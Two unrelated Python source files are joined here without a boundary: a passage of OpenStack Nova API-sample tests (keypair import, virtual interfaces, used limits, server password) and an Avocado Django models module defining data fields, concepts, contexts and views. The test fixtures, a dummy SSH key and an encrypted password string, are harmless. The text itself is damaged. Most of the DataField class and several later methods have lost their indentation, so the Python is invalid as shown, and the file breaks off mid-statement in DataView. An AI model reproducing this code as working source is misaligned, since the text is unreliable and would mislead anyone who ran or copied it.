        # Get api sample of key pairs post to import user's key.
        name = 'keypair-' + str(uuid_lib.uuid4())
        req_subs = {
            'keypair_name': name,
            'public_key': "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDx8nkQv/zgGg"
                          "B4rMYmIf+6A4l6Rr+o/6lHBQdW5aYd44bd8JttDCE/F/pNRr0l"
                          "RE+PiqSPO8nDPHw0010JeMH9gYgnnFlyY3/OcJ02RhIPyyxYpv"
                          "9FhY+2YiUkpwFOcLImyrxEsYXpD/0d3ac30bNH6Sw9JD9UZHYc"
                          "pSxsIbECHw== Generated-by-Nova"
        }
        resp = self._do_post('os-keypairs', 'keypairs-import-post-req',
                             req_subs)
        regexes = self._get_regexes()
        regexes['keypair_name'] = '(%s)' % name
        self._verify_response('keypairs-import-post-resp', regexes, resp, 200)

    def test_keypairs_list(self):
        # Get api sample of key pairs list request.
        name = self.test_keypairs_post()
        resp = self._do_get('os-keypairs')
        regexes = self._get_regexes()
        regexes['keypair_name'] = '(%s)' % name
        self._verify_response('keypairs-list-resp', regexes, resp, 200)

    def test_keypairs_get(self):
        # Get api sample of key pairs get request.
        name = self.test_keypairs_post()
        resp = self._do_get('os-keypairs/%s' % name)
        regexes = self._get_regexes()
        regexes['keypair_name'] = '(%s)' % name
        self._verify_response('keypairs-get-resp', regexes, resp, 200)
class VirtualInterfacesJsonTest(ServersSampleBase):
    """Samples for listing a server's virtual interfaces."""
    extension_name = ("nova.api.openstack.compute.contrib"
                      ".virtual_interfaces.Virtual_interfaces")

    def test_vifs_list(self):
        server_id = self._post_server()
        resp = self._do_get('servers/%s/os-virtual-interfaces' % server_id)
        regexes = self._get_regexes()
        regexes['mac_addr'] = '(?:[a-f0-9]{2}:){5}[a-f0-9]{2}'
        self._verify_response('vifs-list-resp', regexes, resp, 200)
class UsedLimitsSamplesJsonTest(ApiSampleTestBaseV2):
    """Samples for the used-limits view of the limits resource."""
    extension_name = ("nova.api.openstack.compute.contrib.used_limits."
                      "Used_limits")

    def test_get_used_limits(self):
        # Get api sample to used limits.
        resp = self._do_get('limits')
        self._verify_response('usedlimits-get-resp', self._get_regexes(),
                              resp, 200)
class UsedLimitsForAdminSamplesJsonTest(ApiSampleTestBaseV2):
    """Samples for an admin fetching another tenant's used limits."""
    ADMIN_API = True
    extends_name = ("nova.api.openstack.compute.contrib.used_limits."
                    "Used_limits")
    extension_name = (
        "nova.api.openstack.compute.contrib.used_limits_for_admin."
        "Used_limits_for_admin")

    def test_get_used_limits_for_admin(self):
        tenant = 'openstack'
        resp = self._do_get('limits?tenant_id=%s' % tenant)
        regexes = self._get_regexes()
        return self._verify_response('usedlimitsforadmin-get-resp', regexes,
                                     resp, 200)
class AvailabilityZoneJsonTest(ServersSampleBase):
    """Samples for booting a server into an availability zone."""
    extension_name = ("nova.api.openstack.compute.contrib.availability_zone."
                      "Availability_zone")

    def test_create_availability_zone(self):
        subs = {
            'image_id': fake.get_valid_image_id(),
            'host': self._get_host(),
            "availability_zone": "nova"
        }
        resp = self._do_post('servers', 'availability-zone-post-req', subs)
        # Merge the standard regexes on top of the request substitutions.
        subs.update(self._get_regexes())
        self._verify_response('availability-zone-post-resp', subs, resp, 202)
class ExtendedIpsSampleJsonTests(ServersSampleBase):
    """Samples for the extended_ips server attributes."""
    extension_name = ("nova.api.openstack.compute.contrib"
                      ".extended_ips.Extended_ips")

    def test_show(self):
        server_id = self._post_server()
        resp = self._do_get('servers/%s' % server_id)
        regexes = self._get_regexes()
        regexes['hostid'] = '[a-f0-9]+'
        regexes['id'] = server_id
        regexes['hypervisor_hostname'] = r'[\w\.\-]+'
        self._verify_response('server-get-resp', regexes, resp, 200)

    def test_detail(self):
        server_id = self._post_server()
        resp = self._do_get('servers/detail')
        regexes = self._get_regexes()
        regexes['id'] = server_id
        regexes['hostid'] = '[a-f0-9]+'
        self._verify_response('servers-detail-resp', regexes, resp, 200)
class ExtendedIpsMacSampleJsonTests(ServersSampleBase):
    """Samples for the extended_ips_mac server attributes."""
    extension_name = ("nova.api.openstack.compute.contrib"
                      ".extended_ips_mac.Extended_ips_mac")

    def test_show(self):
        server_id = self._post_server()
        resp = self._do_get('servers/%s' % server_id)
        self.assertEqual(resp.status_code, 200)
        regexes = self._get_regexes()
        regexes['hostid'] = '[a-f0-9]+'
        regexes['id'] = server_id
        regexes['hypervisor_hostname'] = r'[\w\.\-]+'
        regexes['mac_addr'] = '(?:[a-f0-9]{2}:){5}[a-f0-9]{2}'
        self._verify_response('server-get-resp', regexes, resp, 200)

    def test_detail(self):
        server_id = self._post_server()
        resp = self._do_get('servers/detail')
        self.assertEqual(resp.status_code, 200)
        regexes = self._get_regexes()
        regexes['id'] = server_id
        regexes['hostid'] = '[a-f0-9]+'
        regexes['mac_addr'] = '(?:[a-f0-9]{2}:){5}[a-f0-9]{2}'
        self._verify_response('servers-detail-resp', regexes, resp, 200)
class ExtendedVIFNetSampleJsonTests(ServersSampleBase):
    """Samples for virtual interfaces extended with network information."""
    extension_name = ("nova.api.openstack.compute.contrib"
                      ".extended_virtual_interfaces_net.Extended_virtual_interfaces_net")

    def _get_flags(self):
        flags = super(ExtendedVIFNetSampleJsonTests, self)._get_flags()
        flags['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
        # extended_virtual_interfaces_net_update also
        # needs virtual_interfaces to be loaded
        flags['osapi_compute_extension'].append(
            'nova.api.openstack.compute.contrib'
            '.virtual_interfaces.Virtual_interfaces')
        return flags

    def test_vifs_list(self):
        server_id = self._post_server()
        resp = self._do_get('servers/%s/os-virtual-interfaces' % server_id)
        self.assertEqual(resp.status_code, 200)
        regexes = self._get_regexes()
        regexes['mac_addr'] = '(?:[a-f0-9]{2}:){5}[a-f0-9]{2}'
        self._verify_response('vifs-list-resp', regexes, resp, 200)
class ServerPasswordSampleJsonTests(ServersSampleBase):
    """Samples for the os-server-password resource."""
    extension_name = ("nova.api.openstack.compute.contrib.server_password."
                      "Server_password")

    def test_get_password(self):
        # Mock password since there is no api to set it
        def fake_ext_password(*args, **kwargs):
            return ("xlozO3wLCBRWAa2yDjCCVx8vwNPypxnypmRYDa/zErlQ+EzPe1S/"
                    "Gz6nfmC52mOlOSCRuUOmG7kqqgejPof6M7bOezS387zjq4LSvvwp"
                    "28zUknzy4YzfFGhnHAdai3TxUJ26pfQCYrq8UTzmKF2Bq8ioSEtV"
                    "VzM0A96pDh8W2i7BOz6MdoiVyiev/I1K2LsuipfxSJR7Wdke4zNX"
                    "JjHHP2RfYsVbZ/k9ANu+Nz4iIH8/7Cacud/pphH7EjrY6a4RZNrj"
                    "QskrhKYed0YERpotyjYk1eDtRe72GrSiXteqCM4biaQ5w3ruS+Ac"
                    "X//PXk3uJ5kC7d67fPXaVz4WaQRYMg==")
        self.stubs.Set(password, "extract_password", fake_ext_password)
        server_id = self._post_server()
        resp = self._do_get('servers/%s/os-server-password' % server_id)
        regexes = self._get_regexes()
        # Escape '+' so the password is matched literally, not as a regex.
        regexes['encrypted_password'] = fake_ext_password().replace('+',
                                                                    '\\+')
        self._verify_response('get-password-resp', regexes, resp, 200)

    def test_reset_password(self):
        server_id = self._post_server()
        resp = self._do_delete('servers/%s/os-server-password' % server_id)
        self.assertEqual(resp.status_code, 204)
class BlockDeviceMappingV2BootJsonTest(ServersSampleBase):
    """Samples for booting a server with a v2 block device mapping."""
    extension_name = ('nova.api.openstack.compute.contrib.'
                      'block_device_mapping_v2_boot.'
                      'Block_device_mapping_v2_boot')

    def _get_flags(self):
        flags = super(BlockDeviceMappingV2BootJsonTest, self)._get_flags()
        flags['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
        # We need the volumes extension as well
        flags['osapi_compute_extension'].append(
            'nova.api.openstack.compute.contrib.volumes.Volumes')
        return flags

    def test_servers_post_with_bdm_v2(self):
        # Stub cinder so volume lookups and attach checks succeed.
        self.stubs.Set(cinder.API, 'get', fakes.stub_volume_get)
        self.stubs.Set(cinder.API, 'check_attach',
                       fakes.stub_volume_check_attach)
        return self._post_server()
class ExtendedAvailabilityZoneJsonTests(ServersSampleBase):
    """Samples for the extended availability zone server attribute."""
    extension_name = ("nova.api.openstack.compute.contrib"
                      ".extended_availability_zone"
                      ".Extended_availability_zone")

    def test_show(self):
        server_id = self._post_server()
        resp = self._do_get('servers/%s' % server_id)
        regexes = self._get_regexes()
        regexes['hostid'] = '[a-f0-9]+'
        self._verify_response('server-get-resp', regexes, resp, 200)

    def test_detail(self):
        self._post_server()
        resp = self._do_get('servers/detail')
        regexes = self._get_regexes()
        regexes['hostid'] = '[a-f0-9]+'
        self._verify_response('servers-detail-resp', regexes, resp, 200)
class ServerGroupQuotas_LimitsSampleJsonTest(LimitsSampleJsonTest):
    # Re-run the limits sample tests with the server_group_quotas
    # extension loaded instead of the plain 'limits' sample directory.
    sample_dir = None
    extension_name = ("nova.api.openstack.compute.contrib."
                      "server_group_quotas.Server_group_quotas")
class ServerGroupQuotas_UsedLimitsSamplesJsonTest(UsedLimitsSamplesJsonTest):
    # Re-run the used-limits sample tests with server_group_quotas
    # loaded on top of the used_limits extension.
    extension_name = ("nova.api.openstack.compute.contrib."
                      "server_group_quotas.Server_group_quotas")
    extends_name = ("nova.api.openstack.compute.contrib.used_limits."
                    "Used_limits")
| |
import logging
import random
import jsonfield
from datetime import datetime
from django.db import models
from django.db.models import Count
from django.contrib.sites.models import Site
from django.contrib.auth.models import User
from django.utils.encoding import smart_unicode
from django.db.models import Q
from django.db.models.fields import FieldDoesNotExist
from django.db.models.signals import post_save, pre_delete
from django.core.exceptions import ValidationError
from avocado.core import utils
from avocado.core.structures import ChoicesDict
from avocado.core.models import Base, BasePlural, PublishArchiveMixin
from avocado.core.cache import post_save_cache, pre_delete_uncache, \
cached_method
from avocado.conf import settings
from avocado import managers, history
from avocado.query.translators import registry as translators
from avocado.query.operators import registry as operators
from avocado.query import oldparsers as parsers
from avocado.stats.agg import Aggregator
from avocado import formatters
# Public API of this module.
__all__ = ('DataCategory', 'DataConcept', 'DataField',
           'DataContext', 'DataView', 'DataQuery')

# Module-level logger.
log = logging.getLogger(__name__)
class DataCategory(Base, PublishArchiveMixin):
    "A high-level organization for data concepts."
    # A reference to a parent for hierarchical categories
    parent = models.ForeignKey('self', null=True, blank=True,
                               related_name='children',
                               limit_choices_to={'parent__isnull': True},
                               help_text='Sub-categories are limited to '
                                         'one-level deep')
    # Explicit ordering weight; stored in the legacy '_order' column.
    order = models.FloatField(null=True, blank=True, db_column='_order')

    objects = managers.DataCategoryManager()

    class Meta(object):
        ordering = ('parent__order', 'parent__name', 'order', 'name')
        verbose_name_plural = 'data categories'
class DataField(BasePlural, PublishArchiveMixin):
"""Describes the significance and/or meaning behind some data. In addition,
it defines the natural key of the Django field that represents the location
of that data e.g. ``library.book.title``.
"""
# App/model/field represent the natural key of this field based on
# Django's methods of distinguishing models.
app_name = models.CharField(max_length=200)
model_name = models.CharField(max_length=200)
field_name = models.CharField(max_length=200)
# Supplementary fields that respresent alternate representations
# of the base field
label_field_name = models.CharField(max_length=200, null=True, blank=True,
help_text='Label field to the '
'reference field')
search_field_name = models.CharField(max_length=200, null=True, blank=True,
help_text='Search field to the '
'reference field')
order_field_name = models.CharField(max_length=200, null=True, blank=True,
help_text='Order field to the '
'reference field')
code_field_name = models.CharField(max_length=200, null=True, blank=True,
help_text='Order field to the '
'reference field')
# An optional unit for this field's data. In some cases databases may have
# a separate column which denotes the unit for another column, but this is
# not always the case. Measurement data, for example, should be
# standardized in the database to allow for consistent querying, thus not
# requiring a separate column denoting the unit per value.
unit = models.CharField(max_length=30, null=True, blank=True)
unit_plural = models.CharField(max_length=40, null=True, blank=True)
# Although a category does not technically need to be defined, this is more
# for workflow reasons than for when the concept is published. Automated
# prcesses may create concepts on the fly, but not know which category they
# should be linked to initially.
category = models.ForeignKey(DataCategory, null=True, blank=True)
# Set this field to true to make this field's values enumerable. This
# should only be enabled for data that contains a discrete vocabulary, i.e.
# no full text data.
enumerable = models.BooleanField(default=False)
# Set this field to False if you wish to exclude this field's data from the
# Haystack index.
indexable = models.BooleanField(default=True)
type = models.CharField(max_length=100, blank=True, null=True,
help_text='Logical type of this field. Typically '
'used downstream for defining behavior '
'and semantics around the field.')
# An optional translator which customizes input query conditions
# to a format which is suitable for the database.
translator = models.CharField(max_length=100, blank=True, null=True,
choices=translators.choices)
# This is used for the cache key to check if the cached values is stale.
data_version = models.IntegerField(default=1, help_text='The current '
'version of the underlying data for '
'this field as of the last '
'modification/update.')
# Certain fields may not be relevant or appropriate for all
# sites being deployed. This is primarily for preventing exposure of
# access to private data from certain sites. For example, there may and
# internal and external deployment of the same site. The internal site
# has full access to all fields, while the external may have a limited set.
# NOTE this is not reliable way to prevent exposure of sensitive data.
# This should be used to simply hide _access_ to the concepts.
sites = models.ManyToManyField(Site, blank=True, related_name='fields+')
# The order of this datafield with respect to the category (if defined).
order = models.FloatField(null=True, blank=True, db_column='_order')
objects = managers.DataFieldManager()
class Meta(object):
unique_together = ('app_name', 'model_name', 'field_name')
ordering = ('category__order', 'category__name', 'order', 'name')
permissions = (
('view_datafield', 'Can view datafield'),
)
@classmethod
def init(cls, app_name, model_name=None, field_name=None, **kwargs):
"""Convenience method for initializing a new instance with metadata
populated directly from the model field instance. This returns an
_unsaved_ instance.
"""
# Field instance
if isinstance(app_name, models.Field):
field = app_name
field_name = field.name
model_name = field.model.module_name
app_name = field.model._meta.app_label
# Dot-delimited string
elif isinstance(app_name, basestring) and '.' in app_name:
values = app_name.split('.')
if len(values) != 3:
raise ValueError("The dot-delimited field format must "
"be 'app.model.field'.")
app_name, model_name, field_name = values
defaults = {
'app_name': app_name,
'model_name': model_name.lower(),
'field_name': field_name,
}
# Temp instance to validate the model field exists
f = cls(**defaults)
if not f.model:
raise ValueError('Unknown model {0}'.format(f.model_name))
if not f.field:
raise ValueError('Unknown field {0} on model {1}.'
.format(f.field_name, f.model_name))
# Add field-derived components
defaults.update({
'name': f.field.verbose_name.title(),
'description': f.field.help_text or None,
})
# Update defaults with kwargs
defaults.update(kwargs)
return cls(**defaults)
def __unicode__(self):
if self.name:
return self.name
return u'{0} {1}'.format(self.model._meta.verbose_name,
self.field.verbose_name).title()
def __len__(self):
return self.size()
def __nonzero__(self):
"Takes precedence over __len__, so it is always truthy."
return True
# The natural key should be used any time fields are being exported
# for integration in another system. It makes it trivial to map to new
# data models since there are discrete parts (as suppose to using the
# primary key).
def natural_key(self):
return self.app_name, self.model_name, self.field_name
# Django Model Field-related Properties and Methods
@property
def real_model(self):
"Returns the model class this datafield is associated with."
if not hasattr(self, '_real_model'):
self._real_model = models.get_model(self.app_name, self.model_name)
return self._real_model
@property
def real_field(self):
"Returns the field object this datafield is associated with."
if self.real_model:
try:
return self.real_model._meta.get_field(self.field_name)
except FieldDoesNotExist:
pass
@property
def model(self):
"Returns the model class this datafield represents."
return self.real_model
@property
def field(self):
"Returns the field object this datafield represents."
return self.real_field
@property
def value_field_name(self):
"Alias for field name."
return self.field_name
@property
def value_field(self):
"Alias for field."
return self.field
@property
def label_field(self):
"Returns the label field object for this datafield."
model = self.model
if model:
field_name = None
if self.label_field_name:
field_name = self.label_field_name
if field_name:
try:
return model._meta.get_field(field_name)
except FieldDoesNotExist:
pass
return self.field
@property
def search_field(self):
"Returns the search field object for this datafield."
model = self.model
if model and self.search_field_name:
try:
return model._meta.get_field(self.search_field_name)
except FieldDoesNotExist:
pass
return self.label_field
@property
def order_field(self):
"Returns the order field object for this datafield."
model = self.model
if model:
field_name = None
if self.order_field_name:
field_name = self.order_field_name
if field_name:
try:
return model._meta.get_field(field_name)
except FieldDoesNotExist:
pass
return self.field
@property
def code_field(self):
"Returns the code field object for this datafield."
model = self.model
if model:
field_name = None
if self.code_field_name:
field_name = self.code_field_name
if field_name:
try:
return model._meta.get_field(field_name)
except FieldDoesNotExist:
pass
@property
def nullable(self):
"Returns whether this field can contain NULL values."
return self.field.null
@property
def internal_type(self):
"Returns the internal type of the field this datafield represents."
return utils.get_internal_type(self.field)
@property
def simple_type(self):
"""Returns a simple type mapped from the internal type."
By default, it will use the field's internal type, but can be
overridden by the ``SIMPLE_TYPE_MAP`` setting.
"""
return utils.get_simple_type(self.field)
@property
def searchable(self):
"Returns true if a text-field and is not an enumerable field."
# Optimized shortcut to prevent database hit for enumerable check..
if self.search_field == self.field:
simple_type = utils.get_simple_type(self.field)
return simple_type == 'string' and not self.enumerable
return utils.is_searchable(self.search_field)
# Convenience Methods
# Easier access to the underlying data for this data field
def values_list(self, order=True, distinct=True, queryset=None):
"Returns a `ValuesListQuerySet` of values for this field."
value_field = self.value_field.name
order_field = self.order_field.name
if queryset is None:
queryset = self.model.objects.all()
queryset = queryset.values_list(value_field, flat=True)
if order:
queryset = queryset.order_by(order_field)
if distinct:
return queryset.distinct()
return queryset
def labels_list(self, order=True, distinct=True, queryset=None):
"Returns a `ValuesListQuerySet` of labels for this field."
label_field = self.label_field.name
order_field = self.order_field.name
if queryset is None:
queryset = self.model.objects.all()
queryset = queryset.values_list(label_field, flat=True)
if order:
queryset = queryset.order_by(order_field)
if distinct:
return queryset.distinct()
return queryset
def codes_list(self, order=True, distinct=True, queryset=None):
"Returns a `ValuesListQuerySet` of labels for this field."
if not self.code_field:
return
code_field = self.code_field.name
order_field = self.order_field.name
if queryset is None:
queryset = self.model.objects.all()
queryset = queryset.values_list(code_field, flat=True)
if order:
queryset = queryset.order_by(order_field)
if distinct:
return queryset.distinct()
return queryset
def search(self, query, queryset=None):
"Rudimentary search for string-based values."
if utils.get_simple_type(self.search_field) == 'string':
field_name = self.search_field.name
filters = {u'{0}__icontains'.format(field_name): query}
return self.values_list(queryset=queryset).filter(**filters)
def get_plural_unit(self):
if self.unit_plural:
plural = self.unit_plural
elif self.unit and not self.unit.endswith('s'):
plural = self.unit + 's'
else:
plural = self.unit
return plural
def get_label(self, value, queryset=None):
"Get the corresponding label to a value."
labels = self.value_labels(queryset=queryset)
if value in labels:
return labels[value]
return smart_unicode(value)
def _has_predefined_choices(self):
"""Returns true if the base field has pre-defined choices and no
alternative label field has been defined.
"""
return bool(self.field.choices)
# Data-related Cached Properties
# These may be cached until the underlying data changes
@cached_method(version='data_version')
def size(self, queryset=None):
"Returns the count of distinct values."
if self._has_predefined_choices():
return len(self.field.choices)
return self.values_list(queryset=queryset).count()
@cached_method(version='data_version')
def values(self, queryset=None):
"Returns a distinct list of values."
if self._has_predefined_choices():
return tuple(zip(*self.field.choices)[0])
return tuple(self.values_list(queryset=queryset))
@cached_method(version='data_version')
def labels(self, queryset=None):
"Returns a distinct list of labels."
if self._has_predefined_choices():
labels = zip(*self.field.choices)[1]
return tuple(smart_unicode(l) for l in labels)
return tuple(
smart_unicode(l) for l in self.labels_list(queryset=queryset))
@cached_method(version='data_version')
def codes(self, queryset=None):
"Returns a distinct set of coded values for this field"
if self._has_predefined_choices():
return tuple(range(self.size(queryset=queryset)))
if self.code_field:
return tuple(self.codes_list(queryset=queryset))
def value_labels(self, queryset=None):
"Returns a distinct set of value/label pairs for this field."
return ChoicesDict(zip(
self.values(queryset=queryset), self.labels(queryset=queryset)))
def coded_labels(self, queryset=None):
"Returns a distinct set of code/label pairs for this field."
codes = self.codes(queryset=queryset)
if codes is not None:
return ChoicesDict(zip(codes, self.labels(queryset=queryset)))
def coded_values(self, queryset=None):
"Returns a distinct set of code/value pairs for this field."
codes = self.codes(queryset=queryset)
if codes is not None:
return ChoicesDict(zip(codes, self.values(queryset=queryset)))
# Alias since it's common parlance in Django
choices = value_labels
coded_choices = coded_labels
# Data Aggregation Properties
def groupby(self, *args, **kwargs):
return Aggregator(
self.field, queryset=kwargs.get('queryset')).groupby(*args)
@cached_method(version='data_version')
def count(self, *args, **kwargs):
"Returns an the aggregated counts."
return Aggregator(
self.field,
queryset=kwargs.pop('queryset', None)).count(*args, **kwargs)
@cached_method(version='data_version')
def max(self, *args, **kwargs):
"Returns the maximum value."
return Aggregator(
self.field, queryset=kwargs.get('queryset')).max(*args)
@cached_method(version='data_version')
def min(self, *args, **kwargs):
"Returns the minimum value."
return Aggregator(
self.field, queryset=kwargs.get('queryset')).min(*args)
@cached_method(version='data_version')
def avg(self, *args, **kwargs):
"Returns the average value. Only applies to quantitative data."
if self.simple_type == 'number':
return Aggregator(
self.field, queryset=kwargs.get('queryset')).avg(*args)
@cached_method(version='data_version')
def sum(self, *args, **kwargs):
"Returns the sum of values. Only applies to quantitative data."
if self.simple_type == 'number':
return Aggregator(
self.field, queryset=kwargs.get('queryset')).sum(*args)
@cached_method(version='data_version')
def stddev(self, *args, **kwargs):
"Returns the standard deviation. Only applies to quantitative data."
if self.simple_type == 'number':
return Aggregator(
self.field,
queryset=kwargs.get('queryset')).stddev(*args)
@cached_method(version='data_version')
def variance(self, *args, **kwargs):
"Returns the variance. Only applies to quantitative data."
if self.simple_type == 'number':
return Aggregator(
self.field,
queryset=kwargs.get('queryset')).variance(*args)
@cached_method(version='data_version')
def sparsity(self, *args, **kwargs):
"Returns the ratio of null values in the population."
if 'queryset' in kwargs:
queryset = kwargs.get('queryset')
else:
queryset = self.model.objects.all()
count = queryset.count()
# No data, 100% sparsity
if count == 0:
return 1.0
isnull = '{0}__isnull'.format(self.value_field.name)
nulls = queryset.filter(**{isnull: True}).count()
return nulls / float(count)
@cached_method(version='data_version')
def dist(self, queryset=None):
if queryset is None:
queryset = self.model.objects.all()
queryset = queryset.values(self.value_field.name)\
.annotate(cnt=Count(self.value_field.name))\
.values_list(self.value_field.name, 'cnt')\
.order_by(self.value_field.name)
return tuple(queryset)
# Translator Convenience Methods
@property
def operators(self):
"Returns the valid operators for this datafield."
trans = translators[self.translator]
return [(x, operators[x].verbose_name) for x
in trans.get_operators(self)]
    def translate(self, operator=None, value=None, tree=None, **context):
        "Convenience method for performing a translation on a query condition."
        # Delegates to the translator registered for this field.
        trans = translators[self.translator]
        return trans.translate(self, operator, value, tree, **context)
    def validate(self, operator=None, value=None, tree=None, **context):
        "Convenience method for validating a query condition."
        # Delegates to the translator registered for this field.
        trans = translators[self.translator]
        return trans.validate(self, operator, value, tree, **context)
def random(self, k, queryset=None):
"""
Returns a k length list of values of this datafield's value population.
"""
return random.sample(self.values(queryset=queryset), k)
class DataConcept(BasePlural, PublishArchiveMixin):
    """Our acceptance of an ontology is, I think, similar in principle to our
    acceptance of a scientific theory, say a system of physics; we adopt, at
    least insofar as we are reasonable, the simplest conceptual scheme into
    which the disordered fragments of raw experience can be fitted and
    arranged.

        -- Willard Van Orman Quine
    """
    # NOTE: the name `type` shadows the builtin, but it maps to a DB column
    # and cannot be renamed without a schema migration.
    type = models.CharField(max_length=100, blank=True, null=True)

    # Although a category does not technically need to be defined, this is
    # more for workflow reasons than for when the concept is published.
    # Automated processes may create concepts on the fly, but not know which
    # category they should be linked to initially. The admin interface
    # enforces choosing a category when the concept is published.
    category = models.ForeignKey(DataCategory, null=True, blank=True)

    # The associated fields for this concept. Fields can be
    # associated with multiple concepts, thus the M2M.
    fields = models.ManyToManyField(DataField, through='DataConceptField',
                                    related_name='concepts')

    # Certain concepts may not be relevant or appropriate for all
    # sites being deployed. This is primarily for preventing exposure of
    # access to private data from certain sites. For example, there may be an
    # internal and external deployment of the same site. The internal site
    # has full access to all fields, while the external may have a limited set.
    # NOTE this is not a reliable way to prevent exposure of sensitive data.
    # This should be used to simply hide _access_ to the concepts.
    sites = models.ManyToManyField(Site, blank=True, related_name='concepts+')

    order = models.FloatField(null=True, blank=True, db_column='_order')

    # An optional formatter which provides custom formatting for this
    # concept relative to the associated fields.
    formatter = models.CharField('formatter', max_length=100, blank=True,
                                 null=True,
                                 choices=formatters.registry.choices)

    # A flag that denotes this concept is viewable, that is, this the concept
    # is appropriate to be used as a viewable interface. Non-viewable concepts
    # can be used to prevent exposing underlying data that may not be
    # appropriate for client consumption.
    viewable = models.BooleanField(default=True)

    # A flag that denotes this concept is 'queryable' which assumes fields
    # that DO NOT result in a nonsensical representation of the concept.
    queryable = models.BooleanField(default=True)

    # A flag that denotes when this concept can be applied to an ORDER BY.
    # Certain concepts are not appropriate because they are too complicated,
    # or a very specific abstraction that does not order by what it actually
    # represents.
    sortable = models.BooleanField(default=True)

    # Set this field to False if you wish to exclude DataFields associated
    # with this concept from the Haystack index.
    indexable = models.BooleanField(default=True)

    objects = managers.DataConceptManager()

    class Meta(object):
        app_label = 'avocado'
        ordering = ('category__order', 'category__name', 'order', 'name')
        permissions = (
            ('view_dataconcept', 'Can view dataconcept'),
        )
class DataConceptField(models.Model):
    "Through model between DataConcept and DataField relationships."
    field = models.ForeignKey(DataField, related_name='concept_fields')
    concept = models.ForeignKey(DataConcept, related_name='concept_fields')

    # Optional per-concept overrides of the field's display names.
    name = models.CharField(max_length=100, null=True, blank=True)
    name_plural = models.CharField(max_length=100, null=True, blank=True)
    order = models.FloatField(null=True, blank=True, db_column='_order')

    created = models.DateTimeField(auto_now_add=True)
    modified = models.DateTimeField(auto_now=True)

    class Meta(object):
        ordering = ('order', 'name')

    def __unicode__(self):
        # Fall back to the underlying field's representation.
        if self.name:
            return self.name
        return unicode(self.field)

    def __bytes__(self):
        text = self.__unicode__()
        return text.encode('utf8')

    def get_plural_name(self):
        "Returns the plural display name, deriving one if not set explicitly."
        if self.name_plural:
            return self.name_plural
        if not self.name:
            return self.field.get_plural_name()
        if self.name.endswith('s'):
            return self.name
        return self.name + 's'
class DataContext(Base):
    """JSON object representing one or more data field conditions. The data
    may be a single condition, an array of conditions or a tree structure.

    This corresponds to the `WHERE` statements in a SQL query.
    """
    json = jsonfield.JSONField(null=True, blank=True, default=dict,
                               validators=[parsers.datacontext.validate])
    session = models.BooleanField(default=False)
    template = models.BooleanField(default=False)
    default = models.BooleanField(default=False)

    # The parent this instance was derived from
    parent = models.ForeignKey('self', null=True, blank=True,
                               related_name='forks')

    # For authenticated users the `user` can be directly referenced,
    # otherwise the session key can be used.
    user = models.ForeignKey(User, null=True, blank=True,
                             related_name='datacontext+')
    session_key = models.CharField(max_length=40, null=True, blank=True)

    # BUGFIX: pass the callable `datetime.now`, not `datetime.now()` -- the
    # call form is evaluated once at import time, so every row would share
    # the same stale timestamp. DataQuery already does this correctly.
    accessed = models.DateTimeField(default=datetime.now, editable=False)

    objects = managers.DataContextManager()

    def __init__(self, *args, **kwargs):
        # Allow a positional dict to stand in for the `json` keyword.
        if args and isinstance(args[0], dict):
            if 'json' in kwargs:
                raise TypeError("{0}.__init__() got multiple values for "
                                "keyword argument 'json'"
                                .format(self.__class__.__name__))
            args = list(args)
            kwargs['json'] = args.pop(0)
        super(DataContext, self).__init__(*args, **kwargs)

    def __unicode__(self):
        toks = []

        # Identifier: first non-empty of name, user, session key, pk
        if self.name:
            toks.append(self.name)
        elif self.user_id:
            toks.append(unicode(self.user))
        elif self.session_key:
            toks.append(self.session_key)
        elif self.pk:
            toks.append('#{0}'.format(self.pk))
        else:
            toks.append('unsaved')

        # State
        if self.default:
            toks.append('default template')
        elif self.template:
            toks.append('template')
        elif self.session:
            toks.append('session')
        else:
            toks.append('rogue')

        return u'{0} ({1})'.format(*toks)

    def clean(self):
        # Enforce at most one default template across all contexts.
        if self.template and self.default:
            queryset = self.__class__.objects.filter(template=True,
                                                     default=True)
            if self.pk:
                queryset = queryset.exclude(pk=self.pk)

            if queryset.exists():
                raise ValidationError('Only one default template can be '
                                      'defined')

    def save(self, *args, **kwargs):
        self.clean()
        super(DataContext, self).save(*args, **kwargs)

    def _combine(self, other, operator):
        "Returns a new unsaved context that composes `self` and `other`."
        if not isinstance(other, self.__class__):
            raise TypeError('Other object must be a DataContext instance')
        cxt = self.__class__()
        cxt.user_id = self.user_id or other.user_id

        if self.json and other.json:
            cxt.json = {
                'type': operator,
                'children': [
                    {'composite': self.pk},
                    {'composite': other.pk}
                ]
            }
        elif self.json:
            cxt.json = {'composite': self.pk}
        elif other.json:
            cxt.json = {'composite': other.pk}
        return cxt

    def __and__(self, other):
        return self._combine(other, 'and')

    def __or__(self, other):
        return self._combine(other, 'or')

    @classmethod
    def validate(cls, attrs, **context):
        "Validate `attrs` as a context."
        return parsers.datacontext.validate(attrs, **context)

    @cached_method(version='modified')
    def count(self, *args, **kwargs):
        "Returns the number of distinct rows matched by this context."
        return self.apply(*args, **kwargs).values('pk').count()

    def parse(self, tree=None, **context):
        "Returns a parsed node for this context."
        return parsers.datacontext.parse(self.json, tree=tree, **context)

    def apply(self, queryset=None, tree=None, **context):
        "Applies this context to a QuerySet."
        if tree is None and queryset is not None:
            tree = queryset.model
        return self.parse(tree=tree, **context).apply(queryset=queryset)

    def language(self, tree=None, **context):
        "Returns the human-readable representation of this context."
        return self.parse(tree=tree, **context).language
class DataView(Base):
    """JSON object representing one or more output columns and sort order.

    This corresponds to the `SELECT` and `ORDER BY` statements in a SQL query.
    """
    json = jsonfield.JSONField(null=True, blank=True, default=dict,
                               validators=[parsers.dataview.validate])
    session = models.BooleanField(default=False)
    template = models.BooleanField(default=False)
    default = models.BooleanField(default=False)

    # The parent this instance was derived from
    parent = models.ForeignKey('self', null=True, blank=True,
                               related_name='forks')

    # For authenticated users the `user` can be directly referenced,
    # otherwise the session key can be used.
    user = models.ForeignKey(User, null=True, blank=True,
                             related_name='dataview+')
    session_key = models.CharField(max_length=40, null=True, blank=True)

    # BUGFIX: pass the callable `datetime.now`, not `datetime.now()` -- the
    # call form is evaluated once at import time, so every row would share
    # the same stale timestamp. DataQuery already does this correctly.
    accessed = models.DateTimeField(default=datetime.now, editable=False)

    objects = managers.DataViewManager()

    def __init__(self, *args, **kwargs):
        # Allow a positional dict to stand in for the `json` keyword.
        if args and isinstance(args[0], dict):
            if 'json' in kwargs:
                raise TypeError("{0}.__init__() got multiple values for "
